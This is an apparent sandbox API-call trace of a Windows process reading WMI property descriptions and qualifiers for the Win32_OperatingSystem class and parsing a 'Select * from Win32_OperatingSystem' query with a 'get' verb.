	[0050.764] IWbemClassObject:Get (in: This=0x233e12d9050, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The ServicePackMajorVersion property indicates the major version number of the service pack installed on the computer system. If no service pack has been installed, the value is zero. ServicePackMajorVersion is valid for computers running Windows 2000 and later (NULL otherwise).", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.765] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.765] lstrlenA (lpString="") returned 0
	[0050.765] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.765] SysStringLen (param_1="The ServicePackMajorVersion property indicates the major version number of the service pack installed on the computer system. If no service pack has been installed, the value is zero. ServicePackMajorVersion is valid for computers running Windows 2000 and later (NULL otherwise).") returned 0x117
	[0050.765] SysStringLen (param_1="") returned 0x0
	[0050.765] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.765] IWbemClassObject:Get (in: This=0x233e12d9050, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.765] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.765] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0050.765] SysStringLen (param_1="Description") returned 0xb
	[0050.765] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0050.765] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.765] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0050.765] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.765] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0050.765] SysStringLen (param_1="OSType") returned 0x6
	[0050.765] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0050.766] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0050.766] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0050.766] SysStringLen (param_1="QuantumLength") returned 0xd
	[0050.766] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0050.766] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0050.766] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0050.766] SysStringLen (param_1="SerialNumber") returned 0xc
	[0050.766] SysStringLen (param_1="SerialNumber") returned 0xc
	[0050.766] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0050.766] IUnknown:Release (This=0x233e12d9050) returned 0x1
	[0050.766] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.766] IWbemClassObject:Get (in: This=0x233e12d9300, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eb868, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMinorVersion", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.766] IWbemClassObject:Get (in: This=0x233e12d9300, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ebe58, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="ServicePackMinorVersion", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.766] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.766] IWbemClassObject:Get (in: This=0x233e12d9300, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The ServicePackMinorVersion property indicates the minor version number of the service pack installed on the computer system. If no service pack has been installed, the value is zero. ServicePackMinorVersion is valid for computers running Windows 2000 and later (NULL otherwise).", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.767] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.767] lstrlenA (lpString="") returned 0
	[0050.767] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc150, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.767] SysStringLen (param_1="The ServicePackMinorVersion property indicates the minor version number of the service pack installed on the computer system. If no service pack has been installed, the value is zero. ServicePackMinorVersion is valid for computers running Windows 2000 and later (NULL otherwise).") returned 0x117
	[0050.767] SysStringLen (param_1="") returned 0x0
	[0050.767] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.767] IWbemClassObject:Get (in: This=0x233e12d9300, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.767] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.767] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0050.767] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.767] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0050.767] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.767] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0050.767] SysStringLen (param_1="OSType") returned 0x6
	[0050.767] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0050.767] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0050.767] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0050.768] SysStringLen (param_1="QuantumLength") returned 0xd
	[0050.768] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0050.768] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0050.768] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0050.768] SysStringLen (param_1="SerialNumber") returned 0xc
	[0050.768] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0050.768] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0050.768] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0050.768] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0050.768] IUnknown:Release (This=0x233e12d9300) returned 0x1
	[0050.768] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.768] IWbemClassObject:Get (in: This=0x233e12da320, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ebe58, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SizeStoredInPagingFiles", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.768] IWbemClassObject:Get (in: This=0x233e12da320, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ebf48, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="SizeStoredInPagingFiles", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.769] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.769] IWbemClassObject:Get (in: This=0x233e12da320, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The total number of kilobytes that can be stored in the operating system's paging files. Note that this number does not represent the actual physical size of the paging file on disk.  0 indicates that there are no paging files.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.769] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.769] lstrlenA (lpString="") returned 0
	[0050.769] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1f0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.769] SysStringLen (param_1="The total number of kilobytes that can be stored in the operating system's paging files. Note that this number does not represent the actual physical size of the paging file on disk.  0 indicates that there are no paging files.") returned 0xe3
	[0050.769] SysStringLen (param_1="") returned 0x0
	[0050.769] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.769] IWbemClassObject:Get (in: This=0x233e12da320, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x1, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.769] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.770] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17
	[0050.770] SysStringLen (param_1="LastBootUpTime") returned 0xe
	[0050.770] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17
	[0050.770] SysStringLen (param_1="NumberOfProcesses") returned 0x11
	[0050.770] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17
	[0050.770] SysStringLen (param_1="OSType") returned 0x6
	[0050.770] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17
	[0050.770] SysStringLen (param_1="PlusVersionNumber") returned 0x11
	[0050.770] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17
	[0050.770] SysStringLen (param_1="QuantumLength") returned 0xd
	[0050.770] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17
	[0050.770] SysStringLen (param_1="RegisteredUser") returned 0xe
	[0050.770] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17
	[0050.770] SysStringLen (param_1="ServicePackMajorVersion") returned 0x17
	[0050.770] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17
	[0050.770] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0050.770] SysStringLen (param_1="ServicePackMinorVersion") returned 0x17
	[0050.770] SysStringLen (param_1="SizeStoredInPagingFiles") returned 0x17
	[0050.770] IUnknown:Release (This=0x233e12da320) returned 0x1
	[0050.770] SafeArrayGetElement (in: psa=0x233e128b6d0, rgIndices=0x350027f0b8, pv=0x350027f050 | out: pv=0x350027f050) returned 0x0
	[0050.770] IWbemClassObject:Get (in: This=0x233e12e4710, wszName="Name", lFlags=0, pVal=0x350027f140*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ebf48, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f140*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.770] IWbemClassObject:Get (in: This=0x233e12e4710, wszName="Derivation", lFlags=0, pVal=0x350027f178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12ec038, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027f178*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="Status", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.771] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.771] IWbemClassObject:Get (in: This=0x233e12e4710, wszName="Description", lFlags=0, pVal=0x350027ef78*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ef78*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="The Status property is a string indicating the current status of the object. Various operational and non-operational statuses can be defined. Operational statuses are \"OK\", \"Degraded\" and \"Pred Fail\". \"Pred Fail\" indicates that an element may be functioning properly but predicting a failure in the near future. An example is a SMART-enabled hard drive. Non-operational statuses can also be specified. These are \"Error\", \"Starting\", \"Stopping\" and \"Service\". The latter, \"Service\", could apply during mirror-resilvering of a disk, reload of a user permissions list, or other administrative work. Not all such work is on-line, yet the managed element is neither \"OK\" nor in one of the other states.", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.771] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.771] lstrlenA (lpString="") returned 0
	[0050.771] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc240, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.771] SysStringLen (param_1="The Status property is a string indicating the current status of the object. Various operational and non-operational statuses can be defined. Operational statuses are \"OK\", \"Degraded\" and \"Pred Fail\". \"Pred Fail\" indicates that an element may be functioning properly but predicting a failure in the near future. An example is a SMART-enabled hard drive. Non-operational statuses can also be specified. These are \"Error\", \"Starting\", \"Stopping\" and \"Service\". The latter, \"Service\", could apply during mirror-resilvering of a disk, reload of a user permissions list, or other administrative work. Not all such work is on-line, yet the managed element is neither \"OK\" nor in one of the other states.") returned 0x2b9
	[0050.771] SysStringLen (param_1="") returned 0x0
	[0050.771] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.771] IWbemClassObject:Get (in: This=0x233e12e4710, wszName="Qualifiers", lFlags=0, pVal=0x350027edf0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edf0*(varType=0x200d, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eeca0*(cDims=0x1, fFeatures=0x240, cbElements=0x8, cLocks=0x0, pvData=0x233e12719f0, rgsabound=((cElements=0x3, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.772] SafeArrayGetLBound (in: psa=0x233e12eeca0, nDim=0x1, plLbound=0x350027edb4 | out: plLbound=0x350027edb4) returned 0x0
	[0050.772] SafeArrayGetUBound (in: psa=0x233e12eeca0, nDim=0x1, plUbound=0x350027edb8 | out: plUbound=0x350027edb8) returned 0x0
	[0050.772] SafeArrayGetElement (in: psa=0x233e12eeca0, rgIndices=0x350027ed90, pv=0x350027ed88 | out: pv=0x350027ed88) returned 0x0
	[0050.772] IWbemClassObject:Get (in: This=0x233e12e4460, wszName="Name", lFlags=0, pVal=0x350027edd0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027edd0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="MaxLen", varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.772] IWbemClassObject:Get (in: This=0x233e12e4460, wszName="QualifierValue", lFlags=0, pVal=0x350027ee08*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x0, plFlavor=0x0 | out: pVal=0x350027ee08*(varType=0x2008, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x233e12eed60*(cDims=0x1, fFeatures=0x180, cbElements=0x8, cLocks=0x0, pvData=0x233e1271120, rgsabound=((cElements=0x1, lLbound=0))), varVal2=0x0), pType=0x0, plFlavor=0x0) returned 0x0
	[0050.772] SafeArrayGetLBound (in: psa=0x233e12eed60, nDim=0x1, plLbound=0x350027edac | out: plLbound=0x350027edac) returned 0x0
	[0050.772] SafeArrayGetUBound (in: psa=0x233e12eed60, nDim=0x1, plUbound=0x350027eda8 | out: plUbound=0x350027eda8) returned 0x0
	[0050.772] lstrlenW (lpString="CIMTYPE") returned 7
	[0050.772] lstrlenW (lpString="MaxLen") returned 6
	[0050.772] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0050.772] lstrlenW (lpString="read") returned 4
	[0050.772] lstrlenW (lpString="MaxLen") returned 6
	[0050.772] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="read", cchCount2=4) returned 1
	[0050.772] lstrlenW (lpString="write") returned 5
	[0050.772] lstrlenW (lpString="MaxLen") returned 6
	[0050.772] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="write", cchCount2=5) returned 1
	[0050.772] lstrlenW (lpString="In") returned 2
	[0050.772] lstrlenW (lpString="MaxLen") returned 6
	[0050.772] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="In", cchCount2=2) returned 3
	[0050.772] lstrlenW (lpString="Out") returned 3
	[0050.772] lstrlenW (lpString="MaxLen") returned 6
	[0050.772] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="MaxLen", cchCount1=6, lpString2="Out", cchCount2=3) returned 1
	[0050.772] SafeArrayGetElement (in: psa=0x233e12eed60, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.773] IUnknown:Release (This=0x233e12e4460) returned 0x1
	[0050.773] lstrlenW (lpString="CIMTYPE") returned 7
	[0050.773] lstrlenW (lpString="ValueMap") returned 8
	[0050.773] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0050.773] lstrlenW (lpString="read") returned 4
	[0050.773] lstrlenW (lpString="ValueMap") returned 8
	[0050.773] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="read", cchCount2=4) returned 3
	[0050.773] lstrlenW (lpString="write") returned 5
	[0050.773] lstrlenW (lpString="ValueMap") returned 8
	[0050.773] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="write", cchCount2=5) returned 1
	[0050.773] lstrlenW (lpString="In") returned 2
	[0050.773] lstrlenW (lpString="ValueMap") returned 8
	[0050.773] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="In", cchCount2=2) returned 3
	[0050.773] lstrlenW (lpString="Out") returned 3
	[0050.773] lstrlenW (lpString="ValueMap") returned 8
	[0050.773] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="ValueMap", cchCount1=8, lpString2="Out", cchCount2=3) returned 3
	[0050.773] SafeArrayGetElement (in: psa=0x233e12ee620, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.773] IUnknown:Release (This=0x233e12e39a0) returned 0x1
	[0050.773] lstrlenW (lpString="CIMTYPE") returned 7
	[0050.773] lstrlenW (lpString="Values") returned 6
	[0050.773] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="CIMTYPE", cchCount2=7) returned 3
	[0050.773] lstrlenW (lpString="read") returned 4
	[0050.773] lstrlenW (lpString="Values") returned 6
	[0050.773] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="read", cchCount2=4) returned 3
	[0050.773] lstrlenW (lpString="write") returned 5
	[0050.773] lstrlenW (lpString="Values") returned 6
	[0050.773] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="write", cchCount2=5) returned 1
	[0050.773] lstrlenW (lpString="In") returned 2
	[0050.773] lstrlenW (lpString="Values") returned 6
	[0050.773] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="In", cchCount2=2) returned 3
	[0050.773] lstrlenW (lpString="Out") returned 3
	[0050.774] lstrlenW (lpString="Values") returned 6
	[0050.774] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="Values", cchCount1=6, lpString2="Out", cchCount2=3) returned 3
	[0050.774] SafeArrayGetElement (in: psa=0x233e12ee620, rgIndices=0x350027ed80, pv=0x350027eda0 | out: pv=0x350027eda0) returned 0x0
	[0050.774] IUnknown:Release (This=0x233e12e41b0) returned 0x1
	[0050.774] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.774] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.774] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.774] lstrlenA (lpString="") returned 0
	[0050.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1a0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.775] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.775] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.775] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.775] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.775] lstrlenA (lpString="") returned 0
	[0050.775] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc220, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.775] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.775] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.775] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.776] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.776] lstrlenA (lpString="") returned 0
	[0050.776] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.776] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.776] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.776] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.776] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.776] lstrlenA (lpString="") returned 0
	[0050.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc220, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.777] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.777] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.777] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.777] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.777] lstrlenA (lpString="") returned 0
	[0050.777] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc0f0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.777] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.777] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.778] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.778] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.778] lstrlenA (lpString="") returned 0
	[0050.778] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc1d0, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.778] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.778] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.778] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.779] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.779] lstrlenA (lpString="") returned 0
	[0050.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc210, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.779] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.779] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.779] ??0CHString@@QEAA@XZ () returned 0x350027ef68
	[0050.779] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.780] lstrlenA (lpString="") returned 0
	[0050.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x7ff66e6bf38c, cbMultiByte=-1, lpWideCharStr=0x233e14fc170, cchWideChar=1 | out: lpWideCharStr="") returned 1
	[0050.780] ??0CHString@@QEAA@XZ () returned 0x350027ed78
	[0050.780] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.781] ??1CHString@@QEAA@XZ () returned 0x7ffbfe19627c
	[0050.782] lstrlenW (lpString="Select * from Win32_OperatingSystem") returned 35
	[0050.782] lstrlenW (lpString="Select * from Win32_OperatingSystem") returned 35
	[0050.782] wcstok (in: _String="Select * from Win32_OperatingSystem", _Delimiter=" ", _Context=0xfffffffffddea1f0 | out: _String="Select", _Context=0xfffffffffddea1f0) returned="Select"
	[0050.782] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x0 | out: _String=0x0, _Context=0x0) returned="*"
	[0050.782] lstrlenW (lpString="FROM") returned 4
	[0050.782] lstrlenW (lpString="*") returned 1
	[0050.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="*", cchCount1=1, lpString2="FROM", cchCount2=4) returned 1
	[0050.782] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x233e1010db0*="" | out: _String=0x0, _Context=0x233e1010db0*="") returned="from"
	[0050.782] lstrlenW (lpString="FROM") returned 4
	[0050.782] lstrlenW (lpString="from") returned 4
	[0050.782] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="from", cchCount1=4, lpString2="FROM", cchCount2=4) returned 2
	[0050.782] wcstok (in: _String=0x0, _Delimiter=" ", _Context=0x233e1010db0*="" | out: _String=0x0, _Context=0x233e1010db0*="") returned="Win32_OperatingSystem"
	[0050.783] lstrlenW (lpString="SET") returned 3
	[0050.783] lstrlenW (lpString="get") returned 3
	[0050.783] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="SET", cchCount2=3) returned 1
	[0050.783] lstrlenW (lpString="CREATE") returned 6
	[0050.783] lstrlenW (lpString="get") returned 3
	[0050.783] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="CREATE", cchCount2=6) returned 3
	[0050.783] lstrlenW (lpString="GET") returned 3
	[0050.783] lstrlenW (lpString="get") returned 3
	[0050.783] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="get", cchCount1=3, lpString2="GET", cchCount2=3) returned 2
	[0050.783] ??0CHString@@QEAA@XZ () returned 0x350027f660
	[0050.783] memcpy_s (in: _Destination=0x233e14fc2e0, _DestinationSize=0x1e, _Source=0x233e128e438, _SourceSize=0x10 | out: _Destination=0x233e14fc2e0) returned 0x0
	[0050.783] lstrlenW (lpString="&") returned 1
	[0050.783] lstrlenW (lpString="&") returned 5
	[0050.783] lstrlenW (lpString="<") returned 1
	[0050.783] lstrlenW (lpString="&lt;") returned 4
	[0050.783] lstrlenW (lpString=">") returned 1
	[0050.783] lstrlenW (lpString="&gt;") returned 4
	[0050.783] lstrlenW (lpString="'") returned 1
	[0050.783] lstrlenW (lpString="&apos;") returned 6
	[0050.783] lstrlenW (lpString="\"") returned 1
	[0050.783] lstrlenW (lpString="&quot;") returned 6
	[0050.783] ?Format@CHString@@QEAAXPEBGZZ () returned 0x233e37120bc
	[0050.784] ??1CHString@@QEAA@XZ () returned 0x1
	[0050.784] WbemLocator:IUnknown:AddRef (This=0x233e12241d0) returned 0x3
	[0050.784] lstrlenW (lpString="") returned 0
